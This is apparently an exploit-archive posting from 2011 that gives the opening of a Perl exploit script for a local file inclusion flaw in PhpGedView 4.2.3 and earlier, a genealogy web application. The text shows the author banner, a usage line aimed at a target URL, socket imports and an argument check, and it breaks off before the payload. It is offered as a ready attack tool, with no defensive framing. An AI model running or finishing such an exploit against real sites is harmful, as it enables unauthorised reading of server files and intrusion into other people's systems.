PhpGedView 4.2.3 Local File Inclusion
Posted on 06 January 2011
#!/usr/bin/perl -w # :::::::-. ... ::::::. :::. # ;;, `';, ;; ;;;`;;;;, `;;; # `[[ [[[[' [[[ [[[[[. '[[ # $$, $$$$ $$$ $$$ "Y$c$$ # 888_,o8P'88 .d888 888 Y88 # MMMMP"` "YmmMMMM"" MMM YM # [ Discovered by dun posdub[at]gmail.com ] # ################################################################## # [ PhpGedView <= 4.2.3 ] Local File Inclusion Vulnerability # ################################################################## # # Script: "PhpGedView is a revolutionary genealogy program which # allows you to view and edit your genealogy on your website..." # # Script: http://www.phpgedview.net/ # Download: http://sourceforge.net/projects/phpgedview/ # # Usage: perl expl.pl http://site.com/phpgedview/ # ################################################################## #[ dun / 2011-01-05 ] use IO::Socket; use Socket; use IO::Select; my @modules; if(scalar(@ARGV) < 1) { print " Usage: perl expl.pl http://site.com/phpgedview/ "; exit; } print "